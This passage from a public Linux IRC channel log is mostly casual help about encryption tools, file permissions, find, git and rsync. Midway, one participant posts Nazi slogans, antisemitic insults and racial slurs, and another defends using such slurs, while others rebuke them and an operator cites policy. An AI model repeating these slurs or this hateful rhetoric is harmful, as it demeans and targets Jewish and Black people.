the same test now. I've used exfat in the past and it's been fine, but it's only been for some sensitive text documents, not running binaries or anything. 13:40 < oiaohm> funksh0n: running binaries you get into needing memory maps and the like and things start taking turns for the worst. 13:40 < funksh0n> I see 13:40 < lite4y> is there a way to find if file system is Read-Only using /etc/fstab? 13:41 < funksh0n> lite4y: does it have the ro option? 13:41 < oiaohm> funksh0n: even some applications opening files can run into trouble because when they open files they using different forms of memory mapping that find what exfat, fat32 and ntfs are missing. 13:41 < alexandre9099> oiaohm, what if i need the file to be opened on windows veracrypt? 13:41 < funksh0n> oiaohm: so do you just need to ensure you've got support for those filesystems? 13:42 < lite4y> funksh0n: i dont see ro or w entry in /etc/fstab 13:42 < oiaohm> alexandre9099: depending on what you need to work on those file sometimes it copy to Linux native file system work on it there and then copy it back. 13:42 < funksh0n> I'm not knowledgeable on the technicalities, but fwiw exfat has been fine for me accross windows (7, 10), macos and linux (arch, debian) 13:43 < oiaohm> funksh0n: this is something that at first appears fine until the day it does not work. 13:43 < funksh0n> lite4y: if rw or ro are not specified, I assume it would fall back to a default. 13:43 < lite4y> funksh0n: what is default? rw? 13:43 < funksh0n> no idea sorry 13:43 < lite4y> funksh0n: and where is the default mentioned? in any of the sysctl properties? 13:44 < funksh0n> maybe a manpage? 13:44 < Myrl-saki> How do I nix-shell a drv? 13:44 < alexandre9099> nope, even on ext4 filesystem it asks for admin privileges,if i get my user password wrong (which got root access trough sudo) it says that it failed to get administrative privileges 13:45 < funksh0n> lite4y: look at `man fstab` it covers the defauls in "The fourth field" 13:45 < funksh0n> alexandre9099: are you launching vera with sudo? 13:45 < funksh0n> don't :p 13:46 < alexandre9099> no (that would be bad, i guess) 13:46 < funksh0n> I don't know what the reprecussions would be, but it's not needed - and a moot point if you're not anyway. 13:46 < oiaohm> alexandre9099: if this is wine application should never ask you for admin privileges unless the that wine tells every application that is administrator is not working. 13:46 < BluesKaj> Hiyas all 13:47 < funksh0n> Veracrypt has native Linux support oiaohm 13:47 < alexandre9099> oiaohm, no, i'm trying to run veracrypt without root privileges 13:47 < revel> I don't think you can. 13:48 < funksh0n> revel: I can run veracrypt and mount just fine without sudo/root. 13:48 < revel> Hmm. I thought I remembered you having to enter a password at least once. 13:49 < alexandre9099> funksh0n, do you need to put your root password on the first time (besides the container one) 13:49 < alexandre9099> ? 13:49 < oiaohm> alexandre9099: https://www.phoronix.com/scan.php?page=news_item&px=Linux-Unprivileged-FUSE-Almost mounting requires privillage. 13:49 < oiaohm> alexandre9099: at least until 4.18 that is not released yet. 13:49 < alexandre9099> oiaohm, but, isn't there pmount or something like that (which some file managers use to mount filesystems without privileges)? 13:51 < alexandre9099> no, i think it was fuser or fuse, not sure 13:52 < oiaohm> alexandre9099: https://linux.die.net/man/1/pmount pmount is a form of wrapper that allows user to trigger action approved by policy by root user. It doe snot support veracrypt at this stage. 13:54 < alexandre9099> IIRC this does not require root https://github.com/johang/btfs and does mounting, it would be nice to see something similar on veracrypt :) 13:55 < funksh0n> alexandre9099: no, I'm just running it as my regular user. I am a member of wheel but I'm not utilising it - I'm just running it as me. The only password I have to enter is the container password. 13:55 < funksh0n> the container file is in my home directory and I own the mountpoint. 13:56 < alexandre9099> hmm awkward, maybe you have "no password sudo"? 13:56 < funksh0n> I do not. 13:56 < funksh0n> and again, I'm not using sudo 13:56 < oiaohm> funksh0n: what is the mount command. 13:57 < alexandre9099> you don't, but i assume that veracrypt uses sudo to escalate privileges, if i had time i could try with another user :) 13:57 < funksh0n> alexandre9099: I take that back, I AM using passwordless sudo... Sorry! 13:57 < alexandre9099> oh :D that explains it XD 13:57 < funksh0n> oiaohm: I don't know, veracrypt is gui so I just let it do it's thing. 13:58 < rangergord> is veracrypt less of a slow joke if you use its own containers instead of TrueCrypt's? 13:58 < funksh0n> Sorry alexandre9099 my bad. Typically I do not use passwordless sudo, but I'm not on a typical machine right now :P 13:58 < alexandre9099> rangergord, afaik truecrypt was deprecated, no longer supported 13:58 < alexandre9099> funksh0n, well, no problem :) 13:59 < funksh0n> rangergord: doesn't run slowly for me with AES default settigns. 13:59 < alexandre9099> so, is there any alternative to veracrypt that does not require root? 13:59 < rangergord> alexandre9099: all I remember is veracrypt taking 5 minutes to validate my password on a TC volume, then failing...even though it worked fine on TC 7.1a. So I just kept using 7.1a. 13:59 < revel> alexandre9099: GPG-encrypted tar archives? :P 13:59 < rangergord> anyway the sort of data theft I'm worried about, TC is enough for me. It's just credit card info, passport scan, etc. 13:59 < oiaohm> alexandre9099: problem is dm-crypt is support by pmount but librecrypt on windows is now not maintained. 14:01 < rangergord> I'd rather use a high-quality deprecated tool than a crappy maintained replacement 14:01 < revel> rangergord: How's Veracrypt crappy...? 14:02 < revel> It's a fork of Truecrypt, after all. 14:02 < revel> Can you tell me exactly what they did to make it worse? 14:02 < rangergord> revel: like I said, it took forever to open my TC container, only to reject the password (which wasn't incorrect, so that's even worse). TC would tell you if your password was incorrect instantly. 14:02 < rangergord> they claim TC volume compatibility, and they fail at that 14:03 < oiaohm> rangergord: the security audit on Truecrypt that made verecrypt did result in it not opening a few old partitions with failing passwords. These also turn out to be partitions that could be cracked open. 14:03 < TheFartGoblin> we all have the right to shit our pants. 14:04 < JimBuntu> No ma'am, that's a privilege. 14:04 < rangergord> what do you mean by old partitions? volumes created by older TC versions? 14:04 < revel> rangergord: Compatibility with its predacessor is the only thing you want? 14:04 < TheFartGoblin> ma'am? ??? 14:04 < TheFartGoblin> im a dude you stupid fucker 14:04 < rangergord> revel: I'm saying it wasn't exactly a good first impression, so I dropped it 14:04 < TheFartGoblin> HAIL HITLER 14:04 < rangergord> TheFartGoblin: you mean Hydra? 14:04 < revel> You mean Eris? 14:04 < TheFartGoblin> no i mean Hitler a.k.a. your mom 14:04 < JimBuntu> Do you mean like raining from the sky or like throw frozen ice at something? 14:05 < TheFartGoblin> nah dude 14:05 < JimBuntu> "frozen ice" 14:05 < TheFartGoblin> here i will say it in german 14:05 < TheFartGoblin> HEIL HITLER 14:05 < TheFartGoblin> DEUTSCHLAND ÜBER ALLES 14:05 < revel> !ops TheFartGoblin bad troll 14:05 < TheFartGoblin> ALLE HEIL DAS DRITTE REICH 14:05 < TheFartGoblin> !ops revel fat jew 14:05 < revel> :D 14:05 < revel> I'm just pudgy. 14:05 < TheFartGoblin> im not that bad lol 14:06 < rangergord> TheFartGoblin: you can't play a videogame or something when you're bored? 14:06 < rangergord> you have to come in a tech channel and spew stuff that wasn't even provocative anymore even 10 years ago? 14:06 < djph> JimBuntu: I'm pretty sure he meant "I'm a 10 year old, and using mommy's computer without her permission, please don't tell her." But then I /ignored him, so ... 14:07 < rangergord> djph: 10 to 1 says he's at least 30 14:07 < TheFartGoblin> the JDL would disagree lll 14:07 < TheFartGoblin> *lol 14:07 < rangergord> am I right or am I right? 14:07 < revel> JDL? 14:07 < TheFartGoblin> im 21 years old 14:07 < revel> You mean the JDF? 14:07 < TheFartGoblin> whatever 14:07 < JimBuntu> Jewish Defense League 14:07 < TheFartGoblin> yeah, that 14:07 < revel> Maybe JDL. 14:07 < djph> rangergord: yeah but "30 year old using mommy's computer without her permission" just doesn't sound right. 14:08 < TheFartGoblin> a.k.a. the jew world order 14:08 < rangergord> easy there Ronaldo 14:08 < revel> Hmm. Why'd I think IDF was JDF? 14:08 < TheFartGoblin> rangergord: suck a penis, nigger 14:08 < TheFartGoblin> lol 14:08 < TheFartGoblin> i said the N word 14:09 < TheFartGoblin> now im really edgy 14:09 < oiaohm> rangergord: https://www.extremetech.com/computing/215285-critical-truecrypt-security-bugs-finally-found The reality of security. Items get deprecated and you have to work around it. Also due to other bugs vegacrypt only support back to a partitions created in truecrypt 6.0 or latter. 14:09 < rangergord> well you really triggered me there, so I'm gonna leave 14:09 < djph> rangergord: how about "random hipster trying to sound edgy while she types from her LGBTQ safe-place on campus" ? 14:10 < rangergord> oiaohm: hmm, I don't recall using TC that is so old. I'll see if I can detect volume version somehow. 14:10 < TheFartGoblin> how about this: i like nigger pussy. where is all the colored porn? 14:11 < rangergord> nope, no way to do that 14:11 < oiaohm> TheFartGoblin: https://freenode.net/policies I think you are attempted to see how many times you can break freenode policy without getting a kline. 14:11 < rangergord> Volume Format Version maybe? 14:12 < TheFartGoblin> oiaohm: I am k-lined several times. there's always another free vpn server out there 14:12 < revel> Calm down there, kiddo. 14:14 < oiaohm> TheFartGoblin: Ok so your are doing spam source mapping before major spammers find them keep up the good work getting klined. 14:14 < konimex> what a badass 14:17 < xandroid52> thefartgoblin the jew world order xssaxsxsxsxsxsxs agr hjhkjdal dfk xD best thing i saw today 14:17 < xandroid52> thefartgoblin thatsracist.jpg 14:17 < revel> xandroid52: He got k-lined already. 14:18 < rangergord> I was starting to think he'd need to mock Linux to get banned 14:19 < djph> hurhur linux, you noobs it only has like 1% marketshare according to that browser-website. get with the times... additional derision we're all familiar with here . 14:19 < oiaohm> rangergord: freenode ops normally wait until someone warns person about policy or channel guidelines. Then they normally have 5-10 mins. 14:20 < oiaohm> djph: really good survey would be how many Linux users run adblock or equal that blocks all survey sites. 14:21 < xandroid52> oiaohm tell me 14:21 < xandroid52> what is kline 14:21 < xandroid52> i assume that is like a permanent ban 14:21 < kline> i am kline 14:21 < xandroid52> kline hello 14:21 < xandroid52> i dont ask for who is kline i ask for what it is 14:22 < funksh0n> rangergord: to your original question - veracrypt opens its own volumes quickly. I've got a large volume inside a vm that's running off a 7200rpm 2.5" and it only takes a few seconds to open the container. 14:22 < revel> Hi, kline. Please don't k-line me. 14:22 < oiaohm> xandroid52: https://en.wikipedia.org/wiki/IRCd#K-line 14:23 < oiaohm> xandroid52: even so freenode k-line is more a g-line. 14:23 < oiaohm> xandroid52: basically service wide ban. 14:23 < xandroid52> bwhy 14:24 < djph> oiaohm: assuming you got them to answer the survey in the first place. Although, even if that whole "marketshare by web browser" thing was 100% accurate, it ignores the fact that *nix tends to dominate the server side... 14:24 < xandroid52> i think you dont have a reason, saying pe**is or the n word is not a reason to kline someone :/ 14:25 < oiaohm> djph: you just said the biggest problem about attempting to work out how large Linux is. Linux people love avoiding all forms of surveys. 14:25 < xandroid52> anyway black lives matter i support lgbtqiasdfqwerty12354+++++++++++ pls dont kline me ok? 14:25 < djph> oiaohm: hah, yup. 14:26 < xvzf> I have "control keycode 6 = Control_bracketright" in my .kmap file. What key is keycode 6? What table contains the mapping of keycodes onto physical keys? 14:27 < oiaohm> xandroid52: https://freenode.net/policies if you read down here to off-topic usage they have a few legal requirements to ban people. http://freenode.net/changuide Avoid sensitive material does apply to this channel due to the fact we do get high schools in different places teaching Linux so students. Also people in from work bad langauge is not good either. 14:30 < djph> xvzf: I think the "keycode" is ^] . As for why it's called "keycode 6" ... dunno. 14:30 < oiaohm> xandroid52: people commonly make the mistake that being on-line gets away from the law of the land. When on line it means dealing with your countries law of land and what ever is the law of the land where the service you are using is based. 14:31 < rangergord> oiaohm: you saying that the troll had to be k-lined because we have servers in countries with very weak protection for freedom of speech? 14:31 < rangergord> and the server owners could be held responsible? 14:31 < xandroid52> oiaohm the law is a fake illusion of social codes that make us live in society and in peace, the truth will always be that there is not such thing as "law" there are actions, that moveeverything, if you want to make condition for that actions and call them laws or social codes or whatever, is your problem, 14:31 < xvzf> djph: I am trying to get escaped from telneting a dummy socket. In theory, CTRL-] is the escape character but on my Hungarian keyboard it should be CTRL-5. I tried both 5 on the keyboard and 5 on the numpad to no avail. Do you have any idea what could go wrong? 14:33 < kazdax> aloh aamigos 14:34 < xandroid52> if you want to say that being online is the same that being on the land, you are so so so wrong, its not the same, it will never be, you cant compare seeing a person with seeing a screen 14:34 < djph> xvzf: perhps you need a modifier (e.g. ctrl + shift-5) ? 14:34 < rangergord> xandowsk: oiaohm was stating governments' position, not his own 14:34 < rangergord> (necessarily) 14:35 < oiaohm> rangergord: really the servers are in many countries and what has is legally allowed as to align with all those countries. Very few countries have unlimited freedom of speech. 14:36 < oiaohm> rangergord: as far as I know countries without restriction on freedom of speech you don't have internet connections to run internet services. 14:38 < xandroid52> kazdax привует 14:40 < oiaohm> xandroid52: its just the price of operation. To run items like irc you do have to confirm to local laws or end up at times with servers ceased and other problems. So a law being fake or not does not really help you when your server hardware is stuck in a evidence locker of the next 15 years because you ignored them. 14:40 < xvzf> djph: telnet says it is CTRL-]. Now, running zcat /lib/kbd/keymaps/i386/qwerty/hu101.map.gz | grep "Control.*bracketright" gives me: control keycode 6 = Control_bracketright -- which is the key I need. grepping again I get: keycode 6 = five percent degree -- so this is indeed the 5 so I need CTRL-5. I wonder why this does not work. What setting could I have? A student of mine had it worked on the same machine b 14:41 < interrobangd> mawk, thank you very much, works perfect! 14:41 < ShalokShalom> hi 14:41 < ShalokShalom> i am a newbie: http://docs.humhub.org/admin-installation.html#file-permissions 14:41 < ShalokShalom> file permissions 14:41 < jim> hi 14:41 < ShalokShalom> i am in the folder 14:42 < interrobangd> mawk, i have cloned your repo 14:42 < ShalokShalom> how to make these dirs writeable by the webserver? 14:43 < djph> xvzf: is your regional / language setting correct? also if it's changing, that's not good. 14:43 < jim> - they could be owned by the user the webserver runs as 14:43 < xvzf> djph: locale says I have hu_HU.utf8 for everything 14:43 < xandroid52> oiaohm i dont get your point right, but i agree with gline people who is being annoying without reason and just bc he find funny to make people upset 14:44 < mawk> hi interrobangd 14:44 < djph> xvzf: hm, that should work then - you have to provide the symbol "]". I don't know where that is (or what key combination you'd need) to send that across though. 14:44 < mawk> great ! 14:44 < jim> - the user the webserver runs as could be added to a group that owns the dir, and chmod appropriately 14:44 < bumbar_> how can i change source ip for some process (can't filter based on destination because there's several processes that communicate to the same outside service) 14:45 < djph> xvzf: on an EN_US keyboard, it doesn't need any modifiers (i.e. "]" is obtained with a single keypress) 14:45 < jim> - (NOT recommended) you could add write permission to "other" 14:46 < mawk> add write permission to the group, set mode g+s so that files get automatically owned by that group no matter the user, set umask to 002 14:46 < xandroid52> oiaohm laws are a lie as i said, english is not my native language so i dont get you at all, but i just think that if i make jokes about penises and niggers nobody should offense, internet is not a place for childrens, internet has no owner or rules, if i want to say that, i will, but i dont, bc its a respect issue, and i dont want to offend people, but i have 100% right of say whatever i want, if you will kline me for thinking like this, do it now 14:46 < xandroid52> or shut forever , thanks for your time 14:46 < mawk> or use some ACL 14:46 < mawk> lol xandroid52 14:46 < mawk> I can run naked in the street, nobody should offense 14:46 < jim> ShalokShalom, those are the three ways using unix file permissions; there may be other options if ACLs are available 14:46 < mawk> I can show horror movies to cardiac grandmas, nobody should offense 14:46 < kline> xandroid52, ##linux is for linux discussion 14:46 < xandroid52> mawk no its not the point bc im not in the street i am in an irc 14:46 < djph> mawk: I wouldn't. But I would call the cops ... those guys in lockup are, well, lonely. 14:47 < kline> not the right to be offended 14:47 < mawk> lol 14:47 < kline> so id suggest we drop the topic 14:47 < mawk> I can make enhancements if you want interrobangd 14:47 < mawk> now the order doesn't matter, you can put mnt before net 14:48 < xandroid52> sorry if im making discussion i just want to make myself clear i wont say stuff like that but i want to make clear that i can do it if i want, but this is not a place for doing that stuff but dude, he just say it peniss and niggerr why kline him xD 14:48 < kline> xandroid52, because its against freenode policy 14:49 < jim> xandroid52, watch your language 14:49 < jim> xandroid52, the n word is a bannable offence just by itself 14:50 < ShalokShalom> jim: oh fine 14:50 < ShalokShalom> which way would you choose as a beginner? 14:50 < ShalokShalom> i am hosted at uberspace, so I am without any root access on the server 14:50 < jim> ShalokShalom, one of the first two 14:51 < ShalokShalom> ok.. 14:51 < jim> -not- the third 14:51 < ShalokShalom> i think the current user is already the owner, since I downloaded the files with it? 14:51 < ShalokShalom> there is no other user in that home 14:51 < jim> (I mention the third because it is a possibility, but it's also problematic) 14:51 < ShalokShalom> i see 14:52 < jim> oops be right back 14:52 < xvzf> djph: it had to do with MobaXTerm which I use for a terminal emulator. I tried with putty and there CTRL-5 (alphanumeric keyboard) worked. 14:54 < xandroid52> jim yes, i know, i m not trying to offend anyone, i have issues with rules at every place that i go, ill try to watch my language 14:59 < rangergord> *FACEPALM* subversion's config file doesn't support ~ in paths. WTF? 15:00 < mawk> is the current user what you think ? 15:00 < mawk> anyway 15:00 < jim> isn;t subversion subversive? 15:00 < JimBuntu> subversion has been revisioned, please see git 15:00 < peetaur2> rangergord: use git 15:00 < rangergord> JimBuntu: this is for a client who still use svn, I got no choice 15:00 < mawk> drop the client 15:01 < rangergord> I use git on the local side 15:01 < ShalokShalom> Git is awesome 15:01 < ShalokShalom> So long as you stick to a GUI :P 15:01 < JimBuntu> I like mawk 's suggestion, but I understand and suggest you do your work in git, if allowed, then push all changes at once to the svn repo 15:01 < mawk> sendmail client@clientland.com -s "You're fired !" 15:01 < peetaur2> show him an offer $800k to build it with subversion, or $500k to do it with git and free migration from subversion 15:02 < rangergord> JimBuntu: that's what I usually do, but I have to merge my dev branch with the main branch to pull their latest changes. Gotta use svn for that. 15:02 < thebigj> Any tutorial on writing systemctl? 15:02 < JimBuntu> yuk 15:02 < rangergord> peetaur: yikes, is that the sort of money you make? 15:02 < thebigj> Thanks! 15:02 < thebigj> Systemctl service/ 15:02 < thebigj> ? 15:02 < peetaur2> rangergord: just ratios...apply them to the size of the project 15:02 < rangergord> peetaur2: divide by 100. got it. 15:02 < JimBuntu> thebigj, please be patient, someone or another if possibly running your google/bing search for you right now 15:03 < jml2> JimBuntu, google is better than bingie 15:03 < rangergord> I'm unironically using Edge with Bing right now 15:03 < jim> ShalokShalom, it's definitely possible to get used to git at the command line 15:03 < ShalokShalom> sure sure 15:03 < rangergord> I ONLY use git at the CLI. The trick is to stick to the surface, and don't attempt to understand git. 15:04 < mawk> thebigj: man systemd.service; man systemd.unit 15:04 < ShalokShalom> it`s definitely possible that you mess up your whole configuration pretty easy 15:04 < ShalokShalom> rangergord: yeah, sure 15:04 < jml2> rangergord, surface as in MS surface tablet? XD 15:04 < rangergord> thebigj: I found ArchLinux's systemd wiki entries invaluable to learning systemd (and I'm a Ubuntu user, never used Arch) 15:04 < JimBuntu> ShalokShalom, I use git nearly every day, I haven't even seen the GUI since 2014 or around there, I'm not even sure how long it's been 15:04 < ShalokShalom> do you use rebase? 15:04 < peetaur2> start with the surface..don't let it overwhelm you... learn about it gradually 15:04 < ShalokShalom> yep 15:04 < jim> what all do you have to do with git normally? - create a repo, - commit, - push 15:04 < jml2> rangergord, systemd is very well documented at freedesktop.org 15:05 < rangergord> ShalokShalom: I used to, now I just lazily do a normal merge 15:05 < ShalokShalom> https://learngitbranching.js.org/ 15:05 < jml2> rangergord, problem is it's confusing at the start because the possibilities are explained across 3 manpages 15:05 < jim> ShalokShalom, are you using git with others who are also using git? 15:05 < peetaur2> jim: but there's more...like if you want to test something and butcher the code horribly and want to be able to revert, you make a new branch git checkout -b wip-test-horrible-hackery and commits there won't mess up the normal one 15:06 < ShalokShalom> jim: sure 15:06 < JimBuntu> git flow... start features, commit changes, publish them, track them, merge them, co files I have messed up too badly to bother fixing manually, lol 15:06 < jim> so you're committing too? 15:07 < no_gravity> Hello! Is there a way to do this? find /some/path/ --but-not-the-stuff-in /some/path/somesub/ 15:07 < sujeet> Hi, can someone tell me what the result of wget https://code.jquery.com/jquery-2.0.3.min.js is for them? 15:08 < sujeet> or -O /dev/null 15:08 < jim> ShalokShalom, that is, you're pushing commits you make to an upstream repo that others also push to? 15:08 < no_gravity> sujeet: I get back a bunch of js 15:08 < sujeet> wtf 15:09 < jim> be right back 15:09 < sujeet> I get a 301 back toitself 15:09 < jml2> no_gravity, use the exclude 15:09 < xvzf> djph: it works on putty, does not work on MobaXterm. 15:09 < no_gravity> jml2: ? 15:09 < djph> xvzf: seems to be a ... wait, putty? are you on windows? 15:09 < jml2> no_gravity, use the manpage, it'll tell you many ways actually 15:09 < xvzf> djph: yes, sorry not to mention it 15:10 < peetaur2> no_gravity: find /some/path -not -path "/some/path/somesub/*" 15:10 < djph> xvzf: err, you're probably better to ask in #windows then, why those programs aren't listening to the right key combinations. 15:11 < xvzf> djph: ok 15:11 < djph> or why they're not forwarding the right combos to the machine 15:11 < mawk> on my gitlab README.md is one commit late on the front page 15:11 < mawk> that's super lame 15:12 < mawk> hitting the "housekeeping" button does nothing 15:13 < solidfox> mawk, maybe squash and force push if nobody else uses your repo 15:13 < repys> what is the exit status 255? 15:13 < mawk> solidfox: interrobangd uses the repo 15:14 < no_gravity> peetaur2: That seems to not exclude anything. 15:14 < interrobangd> mawk, big thx.! 15:14 < jml2> no_gravity, the manpage tells you with examples 15:14 < jml2> no_gravity, gotta rtfm :) 15:15 < no_gravity> By the way, I also want to exclude somesub itself. 15:15 < solidfox> mawk, so it's just the 2 of you? 15:15 < no_gravity> So I want to find everything in /some/path/ but not /some/path/somesub/ and its contents. 15:15 < thebigj> rangergord: Archwiki's I found are good one 15:16 < solidfox> mawk, if you both are fully pushed and caught up with master, and on the same latest commit, you could squash, force push real quick. then have interrobangd pull the new history 15:16 < thebigj> mawk: Thanks! 15:16 < thebigj> JimBuntu: Thanks! 15:16 < peetaur2> no_gravity: you probably messed up the paths.... make some dirs that are literally what I had in my example and see it works https://bpaste.net/show/1f008c164f96 15:17 < peetaur2> the 2nd would also exclude things like /some/path/somesubwhichshouldnotbeexcluded/ 15:18 < peetaur2> first shows the dir but not contents you wanted to exclude...an unlisted option would exist to add a 2nd expression for just the dir, or the 3rd used ? so it was 1 expression instead of a 2nd 15:18 < no_gravity> peetaur2: One moment, let me figure it out... 15:27 < no_gravity> peetaur2: Maybe it's different here because my path starts with "~"? Maybe the shell does not expand it? 15:28 < jml2> no_gravity, he's giving bad advice, use the -prune as it states in the manpage 15:29 < peetaur2> no_gravity: the shell will expand ~ when it's not in quotes and is alone or has / after it (otherwise it expects what's after it to be a user name) 15:30 < no_gravity> peetaur2: Yeah, so the quotes kill it. 15:32 < ArcherL> Hi, i am trying this bash program and wanted to know how to optimize it. There is one condition i am only supposed to use the wget..https://pastebin.com/zGtiP5kT 15:32 < ArcherL> any suggestions will be highly appreciated Thanks! 15:32 < Psi-Jack> ArcherL: bad pastebin.com bad! :) 15:33 < jim> ArcherL, also you may wish to ask on #bash 15:33 < Dominian> :) 15:33 < Dominian> pastebin used to be good... 15:33 < Dominian> long ago 15:33 < ArcherL> Ohk Thanks anyway :D 15:33 < ArcherL> Dominian I believe its still good :D 15:33 < Psi-Jack> ArcherL: pastebin.com is frowned upon due to many issues they themselves have caused. Pastes being reformatted, malvertising, adblock blocking, being blocked due to many reasons. See /topic for the channel's official pastebin. 15:34 < jim> not saying you can't ask here, just that #bash might be an additional source of info 15:34 < ArcherL> jim: i get, no issues :P 15:35 < jim> also, here's a handy pastebin, for command output: you can pastebin the output of an arbitrary command by running "anArbitraryCommand | nc termbin.com 9999", and to include error messages, "anArbitraryCommand 2>&1 | nc termbin.com 9999" 15:35 < Dominian> Psi-Jack: I missed rafb.net 15:35 < Dominian> Psi-Jack: I used to have a bakcup of the source code somew here lol 15:36 < Psi-Jack> Dominian: Heh. oh? I never really used that one. I'd considered setting up a termbin alternative, but, I like the multipurpose functionality of stikked. :) 15:37 < kazdax> i just installed bittorrents 15:37 < kazdax> but cant find the command to run it 15:37 < ArcherL> Any suggestions on the code? 15:37 < Psi-Jack> ArcherL: Can't see it to help ya. 15:39 < turkeyhand> in gnome what's that little tab thing in the bottom left and how do I get it? 15:39 < lite4y> is there a good resource to learn about virtual file system.. also do we know about file system before learning about VFS 15:39 < Dominian> Psi-Jack: rafb.net was like.. uber plain text. flat files 15:40 < Psi-Jack> Hmmmmmm.. 15:40 < Dominian> Psi-Jack: no DB involved at all.. really fast... when the site went down, I emailed the maintainer.. and he sent md the code 15:40 < Psi-Jack> Dominian: Kinda like termbin, on the server side. 15:40 < Dominian> Psi-Jack: yeah 15:40 < Dominian> kinda 15:40 < Psi-Jack> termbin is totally flatfile based. 15:40 < Psi-Jack> Just the process to run it specifically is in C. 15:41 < jim> ArcherL, back when the linux box I was using as my gateway had 1/2 gig of ram, whenever I looked at pastebin.com pastes from people, it would crash my browser... every time... 15:41 < Psi-Jack> The one thing nobody really knows about termbin is, do they ever delete your pastes? ;) 15:41 < turkeyhand> does anyone know that little tab thing in the bottom left that comes up with notifications like hexchat and similar 15:42 < Psi-Jack> tab? You mean notifications? 15:42 < ArcherL> shellcheck.net seems a good way to enhance bash codes, just saying 15:42 < ArcherL> jim you were write about #bash 15:42 < Psi-Jack> ArcherL: Yes. shellcheck.net is awesome. 15:42 < azarus> POSIX compliant shell scripts or bust! 15:42 < jim> Psi-Jack, well the good thing about termbin, is their code is under git, and they publish the repo address... so (for example) we could have a termbin 15:42 < JimBuntu> Psi-Jack, we don't have a way to know, but they stop serving them after a month 15:43 < Psi-Jack> jim: Yep. I was just mentionting I'd thought about it. 15:43 < Psi-Jack> I might still actually, but termbin is easily spammable, where-as stikked has anti-spam functionality. 15:43 < Psi-Jack> JimBuntu: So they likely just do find -mtime +30 -delete 15:44 < safinaskar> is there channel related to linux kernel development? 15:44 < jim> ArcherL, they helped you? 15:44 < JimBuntu> Psi-Jack, lol, they could have a cron or something that you are supposed to set up, It's been a couple months since I looked at the code, it may do this as a built in helper function. 15:44 < ArcherL> No but they were talking about something that helped me 15:44 < JimBuntu> #linux-kernel 15:45 < jim> safinaskar, one place that might be, #kernelnewbies on oftc.net 15:45 < Psi-Jack> JimBuntu: It's not. :) 15:45 < jim> safinaskar, also, there is a bot, alis, that can assist you in looking for channels on the Freenode irc net. To start, /msg alis help 15:45 < JimBuntu> Psi-Jack, no? I thought it was for kernel related stuff, I should go read the topic again, I may be wasting a line in my list by being in there, lol 15:46 < Psi-Jack> ArcherL: Heh. Pasting code to #bash, first glances usually sending you to shellcheck.net, especially if it burns their eyes. 15:46 < ArcherL> It will i guess 15:48 < Psi-Jack> JimBuntu: Was responding to your last message towards me. heh 15:49 < JimBuntu> Psi-Jack, yeah I see that now, started taking a quick look at their docs/code. Docs don't even talk about setting something to remove old posts. 15:50 < BCMM> JimBuntu: looks like of like a ghost town, with the /topic still talking about how to port stuff to 2.6! 15:51 < BCMM> safinaskar: ##kernel is not linux-specific, but is probably mostly about linux 15:52 < BCMM> sorry, the grammar in that other message went completely to pieces 15:52 < JimBuntu> BCMM, I noticed that, I have now part'd 16:10 < twainwek> here's something i learned yesterday by accident: doing C-x e in my terminal emulator opens my text editor with existing typed content, and if you edit it and save it, itlll update it. nice 16:11 < twainwek> getting angry and punching the keyboard does payoff apparently 16:20 < rangergord> I need help doing the following: find a bunch of files in a directory (recursively with subdirs), and copy them to a certain dir, while preserving the directories. I would like to use find for this (instead of rsync or what have you), so I can use grep -v to filter out whatever I don't want. So I was trying to use xargs, and got as far as "find -type f | xargs -n1 -I '{}' cp '{}' destdir/", 16:20 < rangergord> but this copies them all into destdir in a flat manner. Any advice? 16:21 < djph> use rsync 16:21 * rangergord bites djph 16:22 < djph> rangergord: "right tool for the job" and all that. 16:23 < rangergord> sigh, allright. I'll go waste more time, reading rsync's exclude pattern docs 16:24 < rangergord> but really if I were smarter, I'd have written a Python script 15 minutes ago and called it a day 16:24 < djph> rangergord: or ask in #bash. But given your find command, rsync seems to be the more correct approach. 16:25 < LissajousPattern> well I guess my ISP finally figured out that their services will no longer be needed by myself. 16:25 < djph> LissajousPattern: oh? 16:25 < LissajousPattern> yeah no more internet for me 16:25 < djph> "oops" 16:25 < LissajousPattern> but yet here I am 16:26 < djph> oh, wait, weren't you that jackass who wanted to steal the 'net connection from their local library, since they're across the street or something 16:26 < LissajousPattern> yeah lol 16:26 < BCMM> rangergord: are you sure the filter you want can't be easily expressed as an exclude pattern in rsync? 16:26 < BCMM> oh sorry that already got mentioned. i'll shut up. 16:27 < rangergord> BCMM: it can, but I was trying to use/learn the more flexible find/grep/xargs so that I'm future-proof 16:27 < LissajousPattern> djph, which by the way I probably won't nor do I really need to 16:27 < djph> future-proof for what? 16:27 < LissajousPattern> obviously I can get online whenever I want 16:27 < rangergord> but I've given up, will just use rsync 16:27 < rangergord> reached my quota of annoyance for the day 16:28 < marktr> I feel rsync is fairly future proof 16:28 < rangergord> djph: further exclude patterns, that I can do in grep -v but might not be able to do with rsync 16:28 < djph> they're (IIRC) regexes in either case. You should be fine (worst case, rsync is globs) 16:29 < rangergord> fair enough 16:29 < LissajousPattern> man so I saw someone making a claim that deepin was spyware...? 16:30 < djph> rangergord: man rsync -> "FILTER RULES" section 16:30 < LissajousPattern> is that true 16:31 < turbo64> hi 16:31 < rangergord> LissajousPattern: never heard of it, but since it appears to be Chinese, probably. You have to remember this is a country with no concept of privacy. 16:31 < LissajousPattern> ah true 16:31 < rangergord> Like, what we call spyware, they call normal 16:31 < twainwek> rangergord: $50 says your python script would not have worked as well as you expect it in the 15 minutes you spent making it 16:32 < turbo64> arent you from the country that invented facebook 16:32 < turbo64> and you want to talk about having a concept of privacy 16:32 < LissajousPattern> rangergord, I really didn't know anything about deepin to begin with 16:33 < djph> turbo64: at least with facebook it was "opt-out" privacy for a while (then they went full orwellian dystopia on everyone, which shouldn't have been surprising) 16:34 < rangergord> turbo64: I'm not American. But allowing citizens the freedom to invent a social media site with tracking behavior, and allowing other citizens the freedom to use the social media site, is not the same thing as a country where you literally have a "online social credit score" that can remove your right to ride a train 16:34 < LissajousPattern> slight difference 16:34 < triceratux> https://www.deepin.org/en/2018/04/14/linux-deepin-is-not-spyware/ 16:34 < turbo64> well yeah the difference is chinese people have their privacy stolen from them 16:34 < turbo64> whereas americans willingly give it away 16:36 < turbo64> they understand the importance of privacy better than we do 16:36 < LissajousPattern> turbo64, you don't strike me as an American. 16:36 < turbo64> thats why their government has to go to such extreme lengths to take it away 16:36 < rangergord> I wish western countries cared more about privacy...but they are the only countries that even give a small fuck about it 16:36 < rangergord> everywhere else is a dystopia by comparison 16:36 < rangergord> same for racism, equality, corruption, etc 16:36 < 